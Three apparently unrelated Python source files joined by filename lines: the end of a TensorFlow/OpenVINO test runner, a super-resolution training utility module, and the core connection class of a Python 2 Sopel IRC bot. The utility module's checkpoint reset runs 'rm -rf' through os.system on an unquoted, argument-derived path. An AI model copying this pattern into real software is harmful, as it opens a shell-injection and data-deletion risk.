Generates a list of test suites and test cases from a TF test target
specified.
Args:
module_list: This is a list tensorflow test target names passed as an argument.
Example --list_tests=math_ops_test.R*
To get the list of tensorflow python test modules, query using bazel.
bazel query 'kind(".*_test rule", //tensorflow/python/...)' --output label
regex_input: Regular expression input strings to filter and list tests.
Few examples of accepted regex_input are:
math_ops_test.DivNoNanTest.testBasic
math_ops_test.DivNoNanTest.* (or math_ops_test.DivNoNanTest)
math_ops_test.D*
math_ops_test.*
math_*_test
math_*_*_test
math*_test
"""
loader = unittest.TestLoader()
alltests = []
listtests = []
invalidtests = []
for test_module in module_list:
try:
moduleobj = __import__(test_module)
except Exception as e:
print("Exception in __import__({})".format(test_module), 'ERROR:',
str(e))
module_list.remove(test_module)
continue
try:
test_suites = loader.loadTestsFromModule(moduleobj)
except Exception as e:
print(
"Exception in loader.loadTestsFromModule({})".format(moduleobj),
'ERROR:', str(e))
module_list.remove(test_module)
continue
for a_testsuite in test_suites:
for a_testcase in a_testsuite:
alltests.append(a_testcase.id())
# change module.class to module.class.*
regex_input = regex_input + ('.*' if (regex_input.count('.') == 1) else '')
regex_pattern = '^' + regex_input + '$'
regex_pattern = re.sub(r'\.', '\\.', regex_pattern)
regex_pattern = re.sub(r'\*', '.*', regex_pattern)
for a_testcase_id in alltests:
if re.search(regex_pattern, a_testcase_id):
listtests.append(a_testcase_id)
if not listtests:
invalidtests.append(regex_input)
return listtests, invalidtests
def read_tests_from_manifest(manifestfile,
tensorflow_path,
g_imported_files=set()):
"""
Reads a file that has include & exclude patterns,
Returns a list of leaf-level single testcase, no duplicates
"""
run_items = set()
skipped_items = set()
g_imported_files.add(manifestfile)
assert os.path.isfile(manifestfile), "Could not find the file"
with open(manifestfile) as fh:
curr_section = ''
for line in fh.readlines():
line = line.split('#')[0].rstrip('\n').strip(' ')
if line == '':
continue
if re.search(r'\[IMPORT\]', line):
curr_section = 'import_section'
continue
if re.search(r'\[RUN\]', line):
curr_section = 'run_section'
continue
if re.search(r'\[SKIP\]', line):
curr_section = 'skip_section'
continue
if curr_section == 'import_section':
if not os.path.isabs(line):
line = os.path.abspath(
os.path.dirname(manifestfile) + '/' + line)
if line in g_imported_files:
sys.exit("ERROR: re-import of manifest " + line + " in " +
manifestfile)
g_imported_files.add(line)
new_runs, new_skips = read_tests_from_manifest(
line, tensorflow_path, g_imported_files)
assert (new_runs.isdisjoint(new_skips))
run_items |= new_runs
skipped_items |= new_skips
run_items -= skipped_items
continue
if curr_section == 'run_section':
new_runs = set(get_test_list(tensorflow_path, line)[0])
skipped_items -= new_runs
run_items |= new_runs
if curr_section == 'skip_section':
new_skips = set(get_test_list(tensorflow_path, line)[0])
new_skips = set([x for x in new_skips if x in run_items])
run_items -= new_skips
skipped_items |= new_skips
assert (run_items.isdisjoint(skipped_items))
print('\n#Tests to Run={}, Skip={} (manifest = {})\n'.format(
len(run_items), len(skipped_items), manifestfile))
return run_items, skipped_items
def func_utrunner_testcase_run(return_dict, runner, a_test):
# This func runs in a separate process
try:
test_result = runner.run(a_test)
success = test_result.wasSuccessful()
return_dict[a_test.id()] = {
'wasSuccessful': success,
'failures': [] if (success) else [('', test_result.failures[0][1])],
'errors': [],
'skipped': []
}
    except Exception as e:
        error_msg = '!!! RUNTIME ERROR !!! Test ' + a_test.id() + ' raised: ' + str(e)
        return_dict[a_test.id()] = {
            'wasSuccessful': False,
            'failures': [('', error_msg)],
            'errors': [('', error_msg)],
            'skipped': []
        }
def run_singletest_in_new_child_process(runner, a_test):
mpmanager_return_dict.clear()
return_dict = mpmanager_return_dict
p = multiprocessing.Process(
target=func_utrunner_testcase_run, args=(return_dict, runner, a_test))
p.start()
p.join()
# A negative exitcode -N indicates that the child was terminated by signal N.
if p.exitcode != 0:
error_msg = '!!! RUNTIME ERROR !!! Test ' + a_test.id(
) + ' exited with code: ' + str(p.exitcode)
print(error_msg)
return_dict[a_test.id()] = {
'wasSuccessful': False,
'failures': [('', error_msg)],
'errors': [('', error_msg)],
'skipped': []
}
return return_dict[a_test.id()]
test_result_map = return_dict[a_test.id()]
return test_result_map
def timeout_handler(signum, frame):
raise Exception("Test took too long to run. Skipping.")
def run_singletest(testpattern, runner, a_test, timeout):
# This func runs in the same process
mpmanager_return_dict.clear()
return_dict = mpmanager_return_dict
import signal
signal.signal(signal.SIGALRM, timeout_handler)
# set timeout here
signal.alarm(timeout)
try:
test_result = runner.run(a_test)
success = test_result.wasSuccessful()
return_dict[a_test.id()] = {
'wasSuccessful': success,
'failures': [] if (success) else [('', test_result.failures[0][1])],
'errors': [],
'skipped': []
}
    except Exception as e:
        error_msg = '!!! RUNTIME ERROR !!! Test ' + a_test.id() + ' raised: ' + str(e)
        print(error_msg)
        return_dict[a_test.id()] = {
            'wasSuccessful': False,
            'failures': [('', error_msg)],
            'errors': [('', error_msg)],
            'skipped': []
        }
    finally:
        signal.alarm(0)  # cancel the pending alarm so it cannot fire after the test returns
    return return_dict[a_test.id()]
def run_test(test_list, xml_report, verbosity=0, timeout=60):
"""
Runs a specific test suite or test case given with the fully qualified
test name and prints stdout.
Args:
test_list: This is the list of tests to run,filtered based on the
regex_input passed as an argument.
Example: --run_test=math_ops_test.A*
verbosity: Python verbose logging is set to 2. You get the help string
of every test and the result.
"""
loader = unittest.TestLoader()
suite = unittest.TestSuite()
succeeded = []
failures = []
skipped = []
run_test_counter = 0
if xml_report is not None:
for testpattern in test_list:
tests = loader.loadTestsFromName(testpattern)
suite.addTest(tests)
assert os.path.isfile(xml_report), "Could not find the file"
with open(xml_report, 'wb') as output:
sys.stdout = open(os.devnull, "w")
sys.stderr = open(os.devnull, "w")
test_result = xmlrunner.XMLTestRunner(
output=output, verbosity=verbosity).run(suite)
sys.stderr = sys.__stderr__
sys.stdout = sys.__stdout__
failures.extend(test_result.failures)
failures.extend(test_result.errors)
succeeded.extend(test_result.successes)
summary = {"TOTAL": test_list, "PASSED": succeeded, "FAILED": failures}
return summary
else:
runner = unittest.TextTestRunner(verbosity=verbosity)
for testpattern in test_list:
testsuite = loader.loadTestsFromName(testpattern)
for a_test in testsuite:
print()
run_test_counter += 1
print('>> >> >> >> ({}) Testing: {} ...'.format(
run_test_counter, a_test.id()))
start = time.time()
if os.getenv('OPENVINO_TF_BACKEND', default="CPU") == "MYRIAD":
test_result_map = run_singletest(testpattern, runner,
a_test, timeout)
else:
test_result_map = run_singletest_in_new_child_process(
runner, a_test)
elapsed = time.time() - start
elapsed = str(timedelta(seconds=elapsed))
if test_result_map['wasSuccessful'] == True:
succeeded.append(a_test.id())
result_str = " \033[92m OK \033[0m " + a_test.id()
elif 'failures' in test_result_map and bool(
test_result_map['failures']):
failures.append(test_result_map['failures'])
result_str = " \033[91m FAIL \033[0m " + a_test.id() + \
'\n\033[91m' + ''.join(test_result_map['failures'][0][1]) + '\033[0m'
elif 'errors' in test_result_map and bool(
test_result_map['errors']):
failures.append(test_result_map['errors'])
result_str = " \033[91m FAIL \033[0m " + a_test.id() + \
'\n\033[91m' + ''.join(test_result_map['errors'][0][1]) + '\033[0m'
if 'skipped' in test_result_map and bool(
test_result_map['skipped']):
skipped.append(test_result_map['skipped'])
print('took', elapsed, 'RESULT =>', result_str)
summary = {
"TOTAL": test_list,
"PASSED": succeeded,
"SKIPPED": skipped,
"FAILED": failures,
}
return summary
def check_and_print_summary(test_results, invalid_list):
print('========================================================')
print("TOTAL: ", len(test_results['TOTAL']))
print("PASSED: ", len(test_results['PASSED']))
if len(test_results['SKIPPED']) > 0:
print(" with skipped: ", len(test_results['SKIPPED']))
print("FAILED: ", len(test_results['FAILED']))
if (len(invalid_list) > 0):
print("INVALID: ", len(invalid_list))
print('========================================================\n')
if len(test_results['FAILED']) == 0:
return True
else:
return False
if __name__ == '__main__':
with warnings.catch_warnings():
warnings.simplefilter("ignore")
status = main()
if status == False:
raise Exception("Tests failed")
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
        open_type = 'a' if os.path.exists(self.get_path('log.txt')) else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
# HCC Hack
#pixel_range /= 1.014176
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
from scipy import signal
from skimage.measure import compare_ssim
def matlab_style_gauss2D(shape=(3,3),sigma=0.5):
"""
2D gaussian mask - should give the same result as MATLAB's fspecial('gaussian',[shape],[sigma])
Acknowledgement : https://stackoverflow.com/questions/17190649/how-to-obtain-a-gaussian-filter-in-python (Author@ali_m)
"""
m,n = [(ss-1.)/2. for ss in shape]
y,x = np.ogrid[-m:m+1,-n:n+1]
h = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )
h[ h < np.finfo(h.dtype).eps*h.max() ] = 0
sumh = h.sum()
if sumh != 0:
h /= sumh
return h
def calc_ssim(X, Y, scale, rgb_range, dataset=None, sigma=1.5, K1=0.01, K2=0.03, R=255):
'''
X : y channel (i.e., luminance) of transformed YCbCr space of X
Y : y channel (i.e., luminance) of transformed YCbCr space of Y
Please follow the setting of psnr_ssim.m in EDSR (Enhanced Deep Residual Networks for Single Image Super-Resolution CVPRW2017).
Official Link : https://github.com/LimBee/NTIRE2017/tree/db34606c2844e89317aac8728a2de562ef1f8aba
The authors of EDSR use MATLAB's ssim as the evaluation tool,
thus this function is the same as ssim.m in MATLAB with C(3) == C(2)/2.
'''
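    # The code below evaluates the standard SSIM map with the C3 = C2/2 simplification folded in:
    #   SSIM(x, y) = ((2*ux*uy + C1) * (2*vxy + C2)) / ((ux^2 + uy^2 + C1) * (vx + vy + C2)),
    # where ux/uy are Gaussian-weighted local means, vx/vy local variances, vxy the local covariance,
    # C1 = (K1*R)^2 and C2 = (K2*R)^2; the result is the mean over the (shaved) image.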
gaussian_filter = matlab_style_gauss2D((11, 11), sigma)
if dataset:
shave = scale
if X.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = X.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
X = X.mul(convert).sum(dim=1)
Y = Y.mul(convert).sum(dim=1)
else:
shave = scale + 6
X = X[..., shave:-shave, shave:-shave].squeeze().cpu().numpy().astype(np.float64)
Y = Y[..., shave:-shave, shave:-shave].squeeze().cpu().numpy().astype(np.float64)
window = gaussian_filter
ux = signal.convolve2d(X, window, mode='same', boundary='symm')
uy = signal.convolve2d(Y, window, mode='same', boundary='symm')
uxx = signal.convolve2d(X*X, window, mode='same', boundary='symm')
uyy = signal.convolve2d(Y*Y, window, mode='same', boundary='symm')
uxy = signal.convolve2d(X*Y, window, mode='same', boundary='symm')
vx = uxx - ux * ux
vy = uyy - uy * uy
vxy = uxy - ux * uy
C1 = (K1 * R) ** 2
C2 = (K2 * R) ** 2
A1, A2, B1, B2 = ((2 * ux * uy + C1, 2 * vxy + C2, ux ** 2 + uy ** 2 + C1, vx + vy + C2))
D = B1 * B2
S = (A1 * A2) / D
mssim = S.mean()
return mssim
|
irc.py
|
# coding=utf-8
"""
irc.py - A Utility IRC Bot
Copyright 2008, Sean B. Palmer, inamidst.com
Copyright 2012, Edward Powell, http://embolalia.net
Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
Licensed under the Eiffel Forum License 2.
Sopel: http://sopel.chat/
When working on core IRC protocol related features, consult protocol
documentation at http://www.irchelp.org/irchelp/rfc/
"""
import sys
import re
import time
import socket
import asyncore
import asynchat
import os
import codecs
import traceback
from tools import stderr, Nick
try:
import select
import ssl
has_ssl = True
except:
#no SSL support
has_ssl = False
import errno
import threading
from datetime import datetime
from tools import verify_ssl_cn
class Origin(object):
source = re.compile(r'([^!]*)!?([^@]*)@?(.*)')
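    # e.g. 'nick!user@host.example' -> groups ('nick', 'user', 'host.example');
    # a bare server name such as 'irc.example.net' yields ('irc.example.net', '', '').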
def __init__(self, bot, source, args, tags):
self.hostmask = source
self.tags = tags
#Split out the nick, user, and host from hostmask per the regex above.
match = Origin.source.match(source or '')
self.nick, self.user, self.host = match.groups()
self.nick = Nick(self.nick)
# If we have more than one argument, the second one is the sender
if len(args) > 1:
target = args[1]
else:
target = None
# Unless we're messaging the bot directly, in which case that second
# arg will be our bot's name.
if target and target.lower() == bot.nick.lower():
target = self.nick
self.sender = target
class Bot(asynchat.async_chat):
def __init__(self, config):
if config.ca_certs is not None:
ca_certs = config.ca_certs
else:
ca_certs = '/etc/pki/tls/cert.pem'
if config.log_raw is None:
#Default is to log raw data, can be disabled in config
config.log_raw = True
asynchat.async_chat.__init__(self)
self.set_terminator('\n')
self.buffer = ''
self.nick = Nick(config.nick)
"""Sopel's current ``Nick``. Changing this while Sopel is running is
untested."""
self.user = config.user
"""Sopel's user/ident."""
self.name = config.name
"""Sopel's "real name", as used for whois."""
self.channels = []
"""The list of channels Sopel is currently in."""
self.stack = []
self.ca_certs = ca_certs
self.hasquit = False
self.sending = threading.RLock()
self.writing_lock = threading.Lock()
self.raw = None
#Right now, only accounting for two op levels.
#This might be expanded later.
#These lists are filled in startup.py, as of right now.
self.ops = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their operators.
"""
self.halfplus = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their half-ops and
ops.
"""
self.voices = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their voices,
half-ops and ops.
"""
#We need this to prevent error loops in handle_error
self.error_count = 0
self.connection_registered = False
""" Set to True when a server has accepted the client connection and
messages can be sent and received. """
def log_raw(self, line, prefix):
''' Log raw line to the raw log '''
if not self.config.core.log_raw:
return
if not self.config.core.logdir:
self.config.core.logdir = os.path.join(self.config.dotdir,
'logs')
if not os.path.isdir(self.config.core.logdir):
try:
os.mkdir(self.config.core.logdir)
except Exception, e:
stderr('There was a problem creating the logs directory.')
stderr('%s %s' % (str(e.__class__), str(e)))
stderr('Please fix this and then run Sopel again.')
os._exit(1)
f = codecs.open(os.path.join(self.config.core.logdir, 'raw.log'),
'a', encoding='utf-8')
f.write(prefix + unicode(time.time()) + "\t")
temp = line.replace('\n', '')
f.write(temp)
f.write("\n")
f.close()
def safe(self, string):
'''Remove newlines from a string'''
string = string.replace('\n', '')
string = string.replace('\r', '')
if not isinstance(string, unicode):
string = unicode(string, encoding='utf8')
return string
def write(self, args, text=None):
"""Send a command to the server
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
is preceded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args`` may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``sopel.write(('PRIVMSG',), 'Hello, world!')``
and ``sopel.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
sending. Additionally, if the message (after joining) is longer than
510 characters, any remaining characters will not be sent.
"""
args = [self.safe(arg) for arg in args]
if text is not None:
text = self.safe(text)
try:
self.writing_lock.acquire() # Blocking lock, can't send two things
# at a time
#From RFC2812 Internet Relay Chat: Client Protocol
#Section 2.3
#
#https://tools.ietf.org/html/rfc2812.html
#
#IRC messages are always lines of characters terminated with a
#CR-LF (Carriage Return - Line Feed) pair, and these messages SHALL
#NOT exceed 512 characters in length, counting all characters
#including the trailing CR-LF. Thus, there are 510 characters
#maximum allowed for the command and its parameters. There is no
#provision for continuation of message lines.
if text is not None:
temp = (u' '.join(args) + ' :' + text)[:510] + '\r\n'
else:
temp = u' '.join(args)[:510] + '\r\n'
self.log_raw(temp, '>>')
self.send(temp.encode('utf-8'))
finally:
self.writing_lock.release()
def run(self, host, port=6667):
try:
self.initiate_connect(host, port)
except socket.error, e:
stderr('Connection error: %s' % e.strerror)
self.hasquit = True
def initiate_connect(self, host, port):
stderr('Connecting to %s:%s...' % (host, port))
source_address = ((self.config.core.bind_host, 0)
if self.config.core.bind_address else None)
self.set_socket(socket.create_connection((host, port),
source_address=source_address))
if self.config.core.use_ssl and has_ssl:
self.send = self._ssl_send
self.recv = self._ssl_recv
elif not has_ssl and self.config.core.use_ssl:
stderr('SSL is not available on your system, attempting connection '
'without it')
self.connect((host, port))
try:
asyncore.loop()
except KeyboardInterrupt:
print 'KeyboardInterrupt'
self.quit('KeyboardInterrupt')
def quit(self, message):
'''Disconnect from IRC and close the bot'''
self.write(['QUIT'], message)
self.hasquit = True
# Wait for acknowledgement from the server. By RFC 2812 it should be
# an ERROR msg, but many servers just close the connection. Either way
# is fine by us.
# Closing the connection now would mean that stuff in the buffers that
# has not yet been processed would never be processed. It would also
# release the main thread, which is problematic because whomever called
# quit might still want to do something before main thread quits.
def handle_close(self):
self.connection_registered = False
self._shutdown()
stderr('Closed!')
# This will eventually call asyncore dispatchers close method, which
# will release the main thread. This should be called last to avoid
# race conditions.
asynchat.async_chat.handle_close(self)
def part(self, channel, msg=None):
'''Part a channel'''
self.write(['PART', channel], msg)
def join(self, channel, password=None):
'''Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its password.
`channel` should not contain a space if `password` is given.'''
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def handle_connect(self):
if self.config.core.use_ssl and has_ssl:
if not self.config.core.verify_ssl:
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=False,
suppress_ragged_eofs=True)
else:
verification = verify_ssl_cn(self.config.host,
int(self.config.port))
if verification == 'NoCertFound':
stderr('Can\'t get server certificate, SSL might be '
'disabled on the server.')
os.unlink(self.config.pid_file_path)
os._exit(1)
elif verification is not None:
stderr('\nSSL Cert information: %s' % verification[1])
if verification[0] is False:
stderr("Invalid certficate, CN mismatch!")
os.unlink(self.config.pid_file_path)
os._exit(1)
else:
stderr('WARNING! certificate information and CN validation '
'are not available. Is pyOpenSSL installed?')
stderr('Trying to connect anyway:')
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=False,
suppress_ragged_eofs=True,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=self.ca_certs)
stderr('\nSSL Handshake initiated...')
error_count = 0
while True:
try:
self.ssl.do_handshake()
break
except ssl.SSLError, err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([self.ssl], [], [])
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [self.ssl], [])
elif err.args[0] == 1:
stderr('SSL Handshake failed with error: %s' %
err.args[1])
os._exit(1)
else:
error_count = error_count + 1
if error_count > 5:
stderr('SSL Handshake failed (%d failed attempts)'
% error_count)
os._exit(1)
raise
except Exception as e:
print >> sys.stderr, ('SSL Handshake failed with error: %s'
% e)
os._exit(1)
self.set_socket(self.ssl)
# Request list of server capabilities. IRCv3 servers will respond with
# CAP * LS (which we handle in coretasks). v2 servers will respond with
# 421 Unknown command, which we'll ignore
self.write(('CAP', 'LS'))
if self.config.core.server_password is not None:
self.write(('PASS', self.config.core.server_password))
self.write(('NICK', self.nick))
self.write(('USER', self.user, '+iw', self.nick), self.name)
stderr('Connected.')
self.last_ping_time = datetime.now()
timeout_check_thread = threading.Thread(target=self._timeout_check)
timeout_check_thread.start()
ping_thread = threading.Thread(target=self._send_ping)
ping_thread.start()
def _timeout_check(self):
while True:
if (
datetime.now() - self.last_ping_time
).seconds > int(self.config.timeout):
stderr(
'Ping timeout reached after %s seconds, closing connection' %
self.config.timeout
)
self.handle_close()
break
else:
time.sleep(int(self.config.timeout))
def _send_ping(self):
while True:
if (
datetime.now() - self.last_ping_time
).seconds > int(self.config.timeout) / 2:
self.write(('PING', self.config.host))
time.sleep(int(self.config.timeout) / 2)
def _ssl_send(self, data):
""" Replacement for self.send() during SSL connections. """
try:
result = self.socket.send(data)
return result
except ssl.SSLError, why:
if why[0] in (asyncore.EWOULDBLOCK, errno.ESRCH):
return 0
else:
raise ssl.SSLError, why
return 0
def _ssl_recv(self, buffer_size):
""" Replacement for self.recv() during SSL connections. From:
http://evanfosmark.com/2010/09/ssl-support-in-asynchatasync_chat """
try:
data = self.socket.read(buffer_size)
if not data:
self.handle_close()
return ''
return data
except ssl.SSLError, why:
if why[0] in (asyncore.ECONNRESET, asyncore.ENOTCONN,
asyncore.ESHUTDOWN):
self.handle_close()
return ''
elif why[0] == errno.ENOENT:
# Required in order to keep it non-blocking
return ''
else:
raise
def collect_incoming_data(self, data):
# We can't trust clients to pass valid unicode.
try:
data = unicode(data, encoding='utf-8')
except UnicodeDecodeError:
# not unicode, let's try cp1252
try:
data = unicode(data, encoding='cp1252')
except UnicodeDecodeError:
# Okay, let's try ISO8859-1
try:
data = unicode(data, encoding='iso8859-1')
except:
# Discard line if encoding is unknown
return
if data:
self.log_raw(data, '<<')
self.buffer += data
def found_terminator(self):
line = self.buffer
if line.endswith('\r'):
line = line[:-1]
self.buffer = u''
self.raw = line
# Break off IRCv3 message tags, if present
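# For example (illustrative only), a line such as
#   @time=2016-01-01T00:00:00.000Z :nick!user@host PRIVMSG #chan :hi
# yields tags == {'time': '2016-01-01T00:00:00.000Z'}, and the rest of the
# line is left for the source/args parsing below.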
tags = {}
if line.startswith('@'):
tagstring, line = line.split(' ', 1)
for tag in tagstring[1:].split(';'):
tag = tag.split('=', 1)
if len(tag) > 1:
tags[tag[0]] = tag[1]
else:
tags[tag[0]] = None
if line.startswith(':'):
source, line = line[1:].split(' ', 1)
else:
source = None
if ' :' in line:
argstr, text = line.split(' :', 1)
args = argstr.split()
args.append(text)
else:
args = line.split()
text = args[-1]
self.last_ping_time = datetime.now()
if args[0] == 'PING':
self.write(('PONG', text))
elif args[0] == 'ERROR':
self.debug(__file__, text, 'always')
if self.hasquit:
self.close_when_done()
elif args[0] == '433':
stderr('Nickname already in use!')
self.handle_close()
origin = Origin(self, source, args, tags)
self.dispatch(origin, text, args)
def dispatch(self, origin, text, args):
pass
def msg(self, recipient, text, max_messages=1):
# We're arbitrarily saying that the max is 400 bytes of text when
# messages will be split. Otherwise, we'd have to account for the bot's
# hostmask, which is hard.
max_text_length = 400
encoded_text = text.encode('utf-8')
excess = ''
if max_messages > 1 and len(encoded_text) > max_text_length:
last_space = encoded_text.rfind(' ', 0, max_text_length)
if last_space == -1:
excess = encoded_text[max_text_length:]
encoded_text = encoded_text[:max_text_length]
else:
excess = encoded_text[last_space + 1:]
encoded_text = encoded_text[:last_space]
# Back to unicode again, so we don't screw things up later.
text = encoded_text.decode('utf-8')
# We'll then send the excess at the end
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
# Otherwise, wait so it's been at least 0.8 seconds + penalty
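# Worked example (added note): for a 120-character message, penalty is
# (120 - 50) / 70 = 1.0, so the bot waits until at least 1.8 seconds have
# passed since the previous message before sending.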
if self.stack:
elapsed = time.time() - self.stack[-1][0]
if elapsed < 3:
penalty = float(max(0, len(text) - 50)) / 70
wait = 0.8 + penalty
if elapsed < wait:
time.sleep(wait - elapsed)
# Loop detection
messages = [m[1] for m in self.stack[-8:]]
if messages.count(text) >= 5:
text = '...'
if messages.count('...') >= 3:
return
self.write(('PRIVMSG', recipient), text)
self.stack.append((time.time(), self.safe(text)))
self.stack = self.stack[-10:]
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
def notice(self, dest, text):
'''Send an IRC NOTICE to a user or a channel. See IRC protocol
documentation for more information'''
self.write(('NOTICE', dest), text)
def error(self, origin=None, trigger=None):
''' Called internally when a module causes an error '''
try:
trace = traceback.format_exc()
trace = trace.decode('utf-8', errors='xmlcharrefreplace')
stderr(trace)
try:
lines = list(reversed(trace.splitlines()))
report = [lines[0].strip()]
for line in lines:
line = line.strip()
if line.startswith('File "/'):
report.append(line[0].lower() + line[1:])
break
else:
report.append('source unknown')
signature = '%s (%s)' % (report[0], report[1])
# TODO: make not hardcoded
log_filename = os.path.join(
self.config.logdir, 'exceptions.log'
)
with codecs.open(
log_filename, 'a', encoding='utf-8'
) as logfile:
logfile.write(u'Signature: %s\n' % signature)
if origin:
logfile.write(
u'from %s at %s:\n' % (
origin.sender, str(datetime.now())
)
)
if trigger:
logfile.write(
u'Message was: <%s> %s\n' % (
trigger.nick, trigger.group(0)
)
)
logfile.write(trace)
logfile.write(
'----------------------------------------\n\n'
)
except Exception as e:
stderr("Could not save full traceback!")
self.debug(__file__, "(From: " + origin.sender +
"), can't save traceback: " + str(e), 'always')
if origin:
self.msg(origin.sender, signature)
except Exception as e:
if origin:
self.msg(origin.sender, "Got an error.")
self.debug(
__file__,
"(From: " + origin.sender + ") " + str(e),
'always'
)
def handle_error(self):
''' Handle any uncaptured error in the core. Overrides asyncore's
handle_error '''
